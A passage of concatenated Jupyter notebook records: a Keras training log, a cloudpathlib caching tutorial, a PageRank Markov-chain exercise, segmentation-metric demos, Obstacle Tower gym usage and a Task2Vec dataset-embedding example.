0.4314 - acc: 0.7940 - val_loss: 0.5149 - val_acc: 0.7543\nEpoch 36/50\n144000/144000 - 55s - loss: 0.4306 - acc: 0.7943 - val_loss: 0.5176 - val_acc: 0.7477\nEpoch 37/50\n144000/144000 - 55s - loss: 0.4307 - acc: 0.7951 - val_loss: 0.5150 - val_acc: 0.7526\nEpoch 38/50\n144000/144000 - 55s - loss: 0.4293 - acc: 0.7967 - val_loss: 0.5179 - val_acc: 0.7553\nEpoch 39/50\n144000/144000 - 55s - loss: 0.4281 - acc: 0.7966 - val_loss: 0.5171 - val_acc: 0.7516\nEpoch 40/50\n144000/144000 - 56s - loss: 0.4294 - acc: 0.7952 - val_loss: 0.5210 - val_acc: 0.7493\nEpoch 41/50\n144000/144000 - 55s - loss: 0.4294 - acc: 0.7959 - val_loss: 0.5176 - val_acc: 0.7514\nEpoch 42/50\n144000/144000 - 55s - loss: 0.4279 - acc: 0.7965 - val_loss: 0.5158 - val_acc: 0.7531\nEpoch 43/50\n144000/144000 - 55s - loss: 0.4281 - acc: 0.7965 - val_loss: 0.5169 - val_acc: 0.7525\nEpoch 44/50\n144000/144000 - 55s - loss: 0.4270 - acc: 0.7974 - val_loss: 0.5177 - val_acc: 0.7531\nEpoch 45/50\n144000/144000 - 55s - loss: 0.4275 - acc: 0.7969 - val_loss: 0.5132 - val_acc: 0.7533\nEpoch 46/50\n144000/144000 - 56s - loss: 0.4281 - acc: 0.7968 - val_loss: 0.5165 - val_acc: 0.7524\nEpoch 47/50\n144000/144000 - 55s - loss: 0.4273 - acc: 0.7965 - val_loss: 0.5165 - val_acc: 0.7517\nEpoch 48/50\n144000/144000 - 55s - loss: 0.4269 - acc: 0.7964 - val_loss: 0.5227 - val_acc: 0.7495\nEpoch 49/50\n144000/144000 - 55s - loss: 0.4257 - acc: 0.7968 - val_loss: 0.5141 - val_acc: 0.7554\nEpoch 50/50\n144000/144000 - 56s - loss: 0.4263 - acc: 0.7979 - val_loss: 0.5182 - val_acc: 0.7521\nTraining Complete\n"
],
[
"import matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\n\n#-----------------------------------------------------------\n# Retrieve a list of list results on training and test data\n# sets for each training epoch\n#-----------------------------------------------------------\nacc=history.history['acc']\nval_acc=history.history['val_acc']\nloss=history.history['loss']\nval_loss=history.history['val_loss']\n\nepochs=range(len(acc)) # Get number of epochs\n\n#------------------------------------------------\n# Plot training and validation accuracy per epoch\n#------------------------------------------------\nplt.plot(epochs, acc, 'r')\nplt.plot(epochs, val_acc, 'b')\nplt.title('Training and validation accuracy')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Accuracy\")\nplt.legend([\"Accuracy\", \"Validation Accuracy\"])\n\nplt.figure()\n\n#------------------------------------------------\n# Plot training and validation loss per epoch\n#------------------------------------------------\nplt.plot(epochs, loss, 'r')\nplt.plot(epochs, val_loss, 'b')\nplt.title('Training and validation loss')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Loss\")\nplt.legend([\"Loss\", \"Validation Loss\"])\n\nplt.figure()\n\n\n# Expected Output\n# A chart where the validation loss does not increase sharply!",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0243b90ce747efe4f166e1ae5daa034158b5c1 | 447,963 | ipynb | Jupyter Notebook | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 128 | 2020-10-07T00:18:55.000Z | 2022-03-31T15:37:12.000Z | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 138 | 2020-10-06T23:46:35.000Z | 2022-03-30T23:04:09.000Z | docs/docs/caching.ipynb | ElucidataInc/cloudpathlib | 9c11c6af2b0ac713ddcd950123d1db3b17515efa | [
"MIT"
] | 20 | 2020-10-15T13:35:27.000Z | 2022-03-23T07:58:58.000Z | 1,025.086957 | 144,988 | 0.955981 | [
[
[
"# Caching\n\nInteracting with files on a cloud provider can mean a lot of waiting on files downloading and uploading. `cloudpathlib` provides seamless on-demand caching of cloud content that can be persistent across processes and sessions to make sure you only download or upload when you need to.",
"_____no_output_____"
],
[
"## Are we synced?\n\nBefore `cloudpathlib`, we spent a lot of time syncing our remote and local files. There was no great solution. For example, I just need one file, but I only have a script that downloads the entire 800GB bucket (or worse, you can't remember exactly _which_ files you need 🤮). Or _even worse_, you have all the files synced to your local machine, but you suspect that some are are up-to-date and some are stale. More often that I'd like to admit, the simplest answer was to blast the whole data directory and download all over again. Bandwidth doesn't grow on trees!\n\n\n## Cache me if you can\n\nPart of what makes `cloudpathlib` so useful is that it takes care of all of that, leaving your precious mental resources free to do other things! It maintains a local cache and only downloads a file if the local version and remote versions are out of sync. Every time you read or write a file, `cloudpathlib` goes through these steps:\n\n- Does the file exist in the cache already?\n- If no, download it to the cache.\n- If yes, does the cached version have the same modtime as the cloud version?\n- If it is older, re-download the file and replace the old cached version with the updated version from the cloud.\n- If the local one is newer, something is up! We don't want to overwrite your local changes with the version from the cloud. If we see this scenario, we'll raise an error and offer some options to resolve the versions.\n\n## Supporting reading and writing\n\nThe cache logic also support writing to cloud files seamlessly in addition to reading. We do this by tracking when a `CloudPath` is opened and on the close of that file, we will upload the new version to the cloud if it has changed.\n\n**Warning** we don't upload files that weren't opened for write by `cloudpathlib`. For example, if you edit a file in the cache manually in a text edior, `cloudpathlib` won't know to update that file on the cloud. If you want to write to a file in the cloud, you should use the `open` or `write` methods, for example:\n\n```python\nwith my_cloud_path.open(\"w\") as f:\n f.write(\"My new text!\")\n```\n\nThis will download the file, write to the text to the local version in the cache, and when that file is closed we know to upload the changed version to the cloud.\n\nAs an example, let's look at using the [Low Altitude Disaster Imagery](https://registry.opendata.aws/ladi/) open dataset on S3. We'll view one images available of a flooding incident available on S3.",
"_____no_output_____"
]
],
[
[
"from cloudpathlib import CloudPath\nfrom itertools import islice\n\nladi = CloudPath(\"s3://ladi/Images/FEMA_CAP/2020/70349\")\n\n# list first 5 images for this incident\nfor p in islice(ladi.iterdir(), 5):\n print(p)",
"s3://ladi/Images/FEMA_CAP/2020/70349/DSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0003_02c30af6-911e-4e01-8c24-7644da2b8672.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0004_d37c02b9-01a8-4672-b06f-2690d70e5e6b.jpg\ns3://ladi/Images/FEMA_CAP/2020/70349/DSC_0005_d05609ce-1c45-4de3-b0f1-401c2bb3412c.jpg\n"
]
],
[
[
"Just because we saw these images are available, it doesn't mean we have downloaded any of this data yet.",
"_____no_output_____"
]
],
[
[
"# Nothing in the cache yet\n!tree {ladi.fspath}",
"/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Now let's look at just the first image from this dataset.",
"_____no_output_____"
]
],
[
[
"flood_image = ladi / \"DSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\"\nflood_image.exists()",
"_____no_output_____"
],
[
"# Still nothing in the cache\n!tree {ladi.fspath}",
"/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Even though we refer to a specific file and make sure it exists in the cloud, we can still do all of that work without actually downloading the file.\n\nIn order to read the file, we do have to download the data. Let's actually display the image:",
"_____no_output_____"
]
],
[
[
"%%time\n%matplotlib inline\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)\n",
"CPU times: user 1.3 s, sys: 435 ms, total: 1.74 s\nWall time: 2.27 s\n"
],
[
"# Downloaded image file in the cache\n!tree {ladi.fspath}",
"\u001b[01;34m/var/folders/8g/v8lwvfhj6_l6ct_zd_rs84mw0000gn/T/tmpqfelhthi/ladi/Images/FEMA_CAP/2020/70349\u001b[00m\r\n└── \u001b[01;35mDSC_0001_5a63d42e-27c6-448a-84f1-bfc632125b8e.jpg\u001b[00m\r\n\r\n0 directories, 1 file\r\n"
]
],
[
[
"Just be using `open`, we've downloaded the file in the background to the cache. Now that it is local, we won't redownload that file unless it changes on the server. We can confirm that by checking if the file is faster to read a second time.",
"_____no_output_____"
]
],
[
[
"%%time\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)",
"CPU times: user 351 ms, sys: 36.7 ms, total: 388 ms\nWall time: 1.08 s\n"
]
],
[
[
"Notice that the second display is much faster since we use the cached version!",
"_____no_output_____"
],
[
"## Keeping the cache around\n\nBy default, the cache uses [`tempfile`](https://docs.python.org/3/library/tempfile.html) this means at some point either Python or your operating system will remove whatever files you have cached. This is helpful in that it means the downloaded files get cleaned up regularly and don't necessarily clutter up your local hard drive.\n\nHowever, sometimes I don't want to have to re-download files I know won't change. For example, in the LADI dataset, I may want to use the images in a Jupyter notebook and every time I restart the notebook I want to always have the downloaded files. I don't want to re-download since I know the LADI images won't be changing on S3.\n\nWe can do this just by using a `Client` that does all the downloading/uploading to a specfic folder on our local machine.",
"_____no_output_____"
]
],
[
[
"from cloudpathlib import S3Client\n\n# explicitly instantiate a client that always uses the local cache\nclient = S3Client(local_cache_dir=\"data\")\n\nladi = client.CloudPath(\"s3://ladi/Images/FEMA_CAP/2020/70349\")",
"_____no_output_____"
],
[
"# Again, nothing in the cache yet, but we see it is all in the \"data\" folder\n!tree {ladi.fspath}",
"data/ladi/Images/FEMA_CAP/2020/70349 [error opening dir]\r\n\r\n0 directories, 0 files\r\n"
]
],
[
[
"Now let's look at just the first image from this dataset. Note that paths created by using the `ladi` root (e.g., by using the `/` operator below or calls like `iterdir` and `glob`) will inherit the same `Client` instance, and therefore the same `local_cache_dir` without our having to do extra work.",
"_____no_output_____"
]
],
[
[
"flood_image = ladi / \"DSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\"\n\nwith flood_image.open(\"rb\") as f:\n i = Image.open(f)\n plt.imshow(i)",
"_____no_output_____"
],
[
"# Now\n!tree {ladi.fspath}",
"\u001b[01;34mdata/ladi/Images/FEMA_CAP/2020/70349\u001b[00m\r\n└── \u001b[01;35mDSC_0002_a89f1b79-786f-4dac-9dcc-609fb1a977b1.jpg\u001b[00m\r\n\r\n0 directories, 1 file\r\n"
],
[
"# let's explicitly cleanup this directory, since it is not handled for us\n!rm -rf data",
"_____no_output_____"
]
],
[
[
"## Accessing the cached version directly (read-only)\n\nMany Python libraries don't properly handle `PathLike` objects. These libraries often only expect a `str` to be passed when working with files or, even worse, they will call `str(p)` on a Path that is passed before using it.\n\nTo use `cloudpathlib` with these libraries, you can pass `.fspath` which will provide the path to the cached version of the file as a string. \n\n**Warning:** Using the `.fspath` property will download the file from the cloud if it does not exist yet in the cache.\n\n**Warning:** Since we are no longer in control of opening/closing the file, we cannot upload any changes when the file is closed. Therefore, you should treat any code where you use `fspath` as _read only_. Writes directly to `fspath` will not be uplaoded to the cloud.\n",
"_____no_output_____"
],
[
"## Handling conflicts\n\nWe try to be conservative in terms of not losing data—especially data stored on the cloud, which is likely to be the canonical version. Given this, we will raise exceptions in two scenarios:\n\n`OverwriteNewerLocalError`\nThis exception is raised if we are asked to download a file, but our local version in the cache is newer. This likely means that the cached version has been updated, but not pushed to the cloud. To work around this you could remove the cache version explicitly if you _know_ you don't need that data. If you did write changes you need, make sure your code uses the `cloudpathlib` versions of the `open`, `write_text`, or `write_bytes` methods, which will upload your changes to the cloud automatically.\n\nThe `CloudPath.open` method supports a `force_overwrite_from_cloud` kwarg to force overwriting your local version.\n\n`OverwriteNewerCloudError`\nThis exception is raised if we are asked to upload a file, but the one on the cloud is newer than our local version. This likely means that a separate process has updated the cloud version, and we don't want to overwrite and lose that new data in the cloud.\n\nThe `CloudPath.open` method supports a `force_overwrite_to_cloud` kwarg to force overwriting the cloud version.\n\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb02441b1ba4ab8f2a14be739fc33f2e31108f9b | 8,069 | ipynb | Jupyter Notebook | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | pagerank/.ipynb_checkpoints/pagerank-checkpoint.ipynb | philip-le/AI_projects | c1ea8bc68a7e2a81a93a645dc167710219425ac0 | [
"MIT"
] | null | null | null | 26.198052 | 108 | 0.498451 | [
[
[
"import os\nimport random\nimport re\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn; seaborn.set_style('whitegrid')\nfrom collections import Counter\n\nfrom pomegranate import *\n\ncorpus_index = 2\nDAMPING = 0.85\nSAMPLES = 10000",
"_____no_output_____"
],
[
"os.getcwd()",
"_____no_output_____"
],
[
"\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"<a\\s+(?:[^>]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n",
"_____no_output_____"
],
[
"corpus = crawl(f'corpus{corpus_index}')\ncorpus",
"_____no_output_____"
],
[
"# define the starting probability for which page to stay\nstart = DiscreteDistribution({\n page: 1/len(corpus) for page in corpus\n})\n\nstart",
"_____no_output_____"
],
[
"# states = {page: State(DiscreteDistribution({'yes': 0.5, 'no': 0.5}), name=page) \n# for page in corpus}\n# states",
"_____no_output_____"
],
[
"# Define transition model\n\ntransition_list = []\nlc = len(corpus)\n\nfor page in corpus:\n if len(corpus[page]) == 0:\n for next_page in corpus:\n transition_list.append([page, next_page, 1/lc])\n else:\n \n for next_page in corpus:\n if next_page in corpus[page]:\n transition_list.append([page, next_page, DAMPING/len(corpus[page])+(1-DAMPING)/lc])\n else:\n transition_list.append([page, next_page, (1-DAMPING)/lc])\n\ntransitions = ConditionalProbabilityTable(transition_list, [start])\n",
"_____no_output_____"
],
[
"# Create Markov chain\nmodel = MarkovChain([start, transitions])",
"_____no_output_____"
],
[
"# Sample 100000 states from chain\nresult = [(x[0], x[1]/SAMPLES) for x in Counter(model.sample(SAMPLES)).most_common()]\nresult",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb02476ff796e8e1edbdf4ce2e981dda99c4506b | 120,871 | ipynb | Jupyter Notebook | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | 3 | 2020-08-18T13:37:11.000Z | 2021-04-26T18:50:55.000Z | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | null | null | null | notebooks/unet_segmentation_metrics.ipynb | KristinaUlicna/unet_segmentation_metrics | ca7326bf8af6352a54ba7d684af7518da060f1a0 | [
"MIT"
] | null | null | null | 371.910769 | 83,972 | 0.939216 | [
[
[
"## Simple demonstration of calculating segmentation metrics",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\nsys.path.append('..')\nimport umetrics\n\nimport numpy as np\nfrom skimage.io import imread",
"_____no_output_____"
],
[
"# load a ground truth - prediction image pair\nn = 1\np = '/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12'\ntrue = imread(os.path.join(p, 'labels_compressed', f'l_{n}.tif'))\npred = imread(os.path.join(p, 'segmented_2019-11-27', f's_{n}.tif'))",
"_____no_output_____"
],
[
"result = umetrics.calculate(true, pred)",
"_____no_output_____"
]
],
[
[
"## visualize the metrics",
"_____no_output_____"
]
],
[
[
"# uncomment for interactive\n# %matplotlib qt",
"_____no_output_____"
],
[
"result.plot()",
"_____no_output_____"
],
[
"print(result.results)",
"============================\n Segmentation Metrics (n=1)\n============================\nn_true_labels: 110\nn_pred_labels: 103\nn_true_positives: 97\nn_false_positives: 6\nn_false_negatives: 8\nIoU: 0.838\nJaccard: 0.874\npixel_identity: 0.991\nlocalization_error: 2.635\n\n"
]
],
[
[
"## plot some stats",
"_____no_output_____"
]
],
[
[
"import matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"bins = np.linspace(0,3000,21)\n\nplt.figure()\nplt.hist(result._reference.areas, bins, alpha=0.5, label='true')\nplt.hist(result._predicted.areas, bins, alpha=0.5, label='pred', edgecolor='k')\nplt.legend()\nplt.title('Histogram of detected object areas')\nplt.xlabel('Pixels')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## do some batch processing",
"_____no_output_____"
]
],
[
[
"files = []\nfor n in range(10):\n true = os.path.join(p, 'labels_compressed', f'l_{n}.tif')\n pred = os.path.join(p, 'segmented_2019-11-27', f's_{n}.tif')\n files.append((true, pred))",
"_____no_output_____"
],
[
"batch_result = umetrics.batch(files)",
"/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_0.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_1.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_2.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_3.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_4.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_5.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_6.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_7.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_8.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_9.tif\n"
],
[
"print(batch_result)",
"=============================\n Segmentation Metrics (n=10)\n=============================\nn_true_labels: 2350\nn_pred_labels: 2291\nn_true_positives: 2175\nn_false_positives: 86\nn_false_negatives: 96\nIoU: 0.858\nJaccard: 0.923\npixel_identity: 0.983\nlocalization_error: 2.172\n\n"
]
],
[
[
"*NOTE(arl)*: the metrics here are calculated as follows in batch mode:\n+ `n_true_labels` is the sum of all true labels, etc\n+ `IoU` is the mean IoU of all found objects\n+ `Jaccard` is the Jaccard index over all found objects\n+ `localization_error` is the mean error for all found objects\n+ `pixel_identity` is the per image pixel identity",
"_____no_output_____"
]
],
[
[
"plt.figure()\nplt.hist(batch_result.per_object_IoU)\nplt.title('Histogram of per object IoU metric')\nplt.xlabel('IoU')\nplt.show()",
"_____no_output_____"
],
[
"plt.figure()\nplt.hist(batch_result.per_object_localization_error, bins=np.linspace(0,10,50))\nplt.title('Histogram of per object localization error')\nplt.xlabel('Error in Pixels')\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb024aa8a0f00cc59cfc01578cb7faff8d94044f | 11,428 | ipynb | Jupyter Notebook | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | 25.913832 | 239 | 0.545765 | [
[
[
"# Basic Usage Guide for Obstacle Tower Gym Interface",
"_____no_output_____"
]
],
[
[
"from obstacle_tower_env import ObstacleTowerEnv, ObstacleTowerEvaluation\n%matplotlib inline\nfrom matplotlib import pyplot as plt\nfrom IPython.display import display, clear_output\nimport numpy as np\n\n# import matplotlib.pyplot as plt\n# import matplotlib.animation as animation",
"_____no_output_____"
]
],
[
[
"## Launching the environment\nEnsure that the Obstacle Tower binary has been downloaded (https://github.com/Unity-Technologies/obstacle-tower-env#download-the-environment), and placed in the correct sub-folder. Here we use the `examples/ObstacleTower` sub-folder.",
"_____no_output_____"
]
],
[
[
"# Realtime mode determines whether the environment window will render the scene,\n# as well as whether the environment will run at realtime speed. Set this to `True`\n# to visual the agent behavior as you would in player mode.\n\nenv = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=False, realtime_mode=True)",
"_____no_output_____"
]
],
[
[
"## Environment information\nWe can also set the random seed used to generate the environment, as well as choose a starting floor.",
"_____no_output_____"
]
],
[
[
"# The environment provided has a MultiDiscrete action space, where the 4 dimensions are:\n\n# 0. Movement (No-Op/Forward/Back)\n# 1. Camera Rotation (No-Op/Counter-Clockwise/Clockwise)\n# 2. Jump (No-Op/Jump)\n# 3. Movement (No-Op/Right/Left)\nprint(env.action_space)\n\n\n# The observation space provided includes a 168x168 image (the camera from the simulation)\n# as well as the number of keys held by the agent (0-5) and the amount of time remaining.\nprint(env.observation_space)",
"_____no_output_____"
]
],
[
[
"## Interacting with the environment",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\nseed = 5 # seed = np.random.randint(100)\nenv.seed(seed) # Seeds can be chosen from range of 0-100.\nenv.floor(0) # Floors can be chosen from range of 0-100.\nobs = env.reset()\n\nplt.imshow(obs[0])",
"_____no_output_____"
],
[
"def run_episode(env):\n done = False\n seed = 5\n env.seed(seed)\n env.floor(0)\n obs = env.reset()\n episode_return = 0.0\n action=[1, 0, 0, 0]\n \n while not done:\n obs, reward, done, info = env.step(env.action_space.sample())\n if not done:\n obs, reward, done, info = env.step(action)\n episode_return += reward\n return episode_return",
"_____no_output_____"
],
[
"##### 跑指定步數 ##### \n\naction=[1, 0, 0, 0]\nr = 0\n\n### img ###\nfig = plt.figure()\nims = []\n\n# observation = [camera, key, time, floor]\n# 1 env.step = 50mms\nfor i in range(0, 100):\n obs, reward, done, info = env.step(env.action_space.sample())\n if not done:\n obs, reward, done, info = env.step(action)\n\n # im = plt.imshow(obs[0], animated =False)\n # ims.append([im])\n # clear_output(True)\n plt.show()\n \n r += reward\n if r>0 :\n print(\"Reward: %.2f\" % r)\n \n if done:\n obs = env.reset()\n print(\"Result Reward: %.2f\" % r)\n\n ### test for save video but get error ###\n\n # ims is a list of lists, each row is a list of artists to draw in the\n # current frame; here we are just animating one artist, the image, in\n # each frame\n \n# ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True, repeat = False, repeat_delay=None)\n\n# To save the animation, use e.g.\n# from matplotlib.animation import FFMpegWriter\n# ani.save(\"movie.mp4\")\n# writer = FFMpegWriter(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save(\"movie.mp4\", writer=writer)\n# plt.show()\n##########",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
],
[
"##### Run until done ##### \n\nenv = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=False, realtime_mode=True)\neval_seeds = [1001]\nenv = ObstacleTowerEvaluation(env, eval_seeds)\n\nprint(\"Total Reward: \",run_episode(env))",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
],
[
"##### 程式分隔線 #####",
"_____no_output_____"
],
[
"print(obs)",
"_____no_output_____"
]
],
[
[
"### Setting environment parameters\nWe can also set the random seed used to generate the environment, as well as choose a starting floor.",
"_____no_output_____"
]
],
[
[
"# Seeds can be chosen from range of 0-100.\nenv.seed(5)",
"_____no_output_____"
],
[
"# Floors can be chosen from range of 0-100.\nenv.floor(15)",
"_____no_output_____"
],
[
"# Additional reset parameters can be set using a config dictionary\n# Here we set the agent perspective to first-person mode.\nconfig = {'agent-perspective': 1}",
"_____no_output_____"
],
[
"# These parameters won't take place until the next reset.\nobs = env.reset(config=config)\nplt.imshow(obs[0])",
"_____no_output_____"
]
],
[
[
"## Evaluation",
"_____no_output_____"
]
],
[
[
"from obstacle_tower_env import ObstacleTowerEnv, ObstacleTowerEvaluation\n%matplotlib inline\nfrom matplotlib import pyplot as plt\n\ndef run_episode(env):\n done = False\n episode_return = 0.0\n \n while not done:\n action = env.action_space.sample()\n obs, reward, done, info = env.step(action)\n episode_return += reward\n return episode_return",
"_____no_output_____"
],
[
"if __name__ == '__main__':\n # In this example we use the seeds used for evaluating submissions \n # to the Obstacle Tower Challenge.\n #eval_seeds = [1001, 1002, 1003, 1004, 1005]\n eval_seeds = [1001]\n\n # Create the ObstacleTowerEnv gym and launch ObstacleTower\n env = ObstacleTowerEnv('./ObstacleTower/obstacletower', realtime_mode=False)\n\n # Wrap the environment with the ObstacleTowerEvaluation wrapper\n # and provide evaluation seeds.\n env = ObstacleTowerEvaluation(env, eval_seeds)\n\n # We can run episodes (in this case with a random policy) until \n # the \"evaluation_complete\" flag is True. Attempting to step or reset after\n # all of the evaluation seeds have completed will result in an exception.\n while not env.evaluation_complete:\n episode_rew = run_episode(env)\n\n # Finally the evaluation results can be fetched as a dictionary from the \n # environment wrapper.\n print(env.results)\n",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
]
],
[
[
"## Launching the environment (retro mode)\nWe also provide a `retro mode` which uses observation and action spaces similar to those found in the Arcade Learning Environment (ALE).",
"_____no_output_____"
]
],
[
[
"env = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=True)",
"_____no_output_____"
],
[
"# In retro mode, the observation is an 84x84 image with the time remaining and key count visually embedded.\nenv.observation_space",
"_____no_output_____"
]
],
[
[
"## Interacting with the environment (retro mode)",
"_____no_output_____"
]
],
[
[
"obs = env.reset()\nprint(obs.shape)",
"_____no_output_____"
],
[
"obs, reward, done, info = env.step(env.action_space.sample())\nplt.imshow(obs)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb0265eb08653ee203b75321c4e4ab369cf28294 | 16,661 | ipynb | Jupyter Notebook | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 67 | 2020-07-07T23:45:34.000Z | 2022-03-16T21:11:09.000Z | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 5 | 2020-07-22T01:09:39.000Z | 2021-11-19T22:34:04.000Z | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 16 | 2020-07-14T14:34:20.000Z | 2022-03-21T01:08:35.000Z | 179.150538 | 14,596 | 0.915491 | [
[
[
"from task2vec import Task2Vec\nfrom models import get_model\nimport datasets\nimport task_similarity",
"_____no_output_____"
],
[
"dataset_names = ('stl10', 'mnist', 'cifar10', 'cifar100', 'letters', 'kmnist')\n# Change `root` with the directory you want to use to download the datasets\ndataset_list = [datasets.__dict__[name](root='./data')[0] for name in dataset_names] ",
"_____no_output_____"
],
[
"embeddings = []\nfor name, dataset in zip(dataset_names, dataset_list):\n print(f\"Embedding {name}\")\n probe_network = get_model('resnet34', pretrained=True, num_classes=int(max(dataset.targets)+1)).cuda()\n embeddings.append( Task2Vec(probe_network, max_samples=1000, skip_layers=6).embed(dataset) )",
"_____no_output_____"
],
[
"task_similarity.plot_distance_matrix(embeddings, dataset_names)",
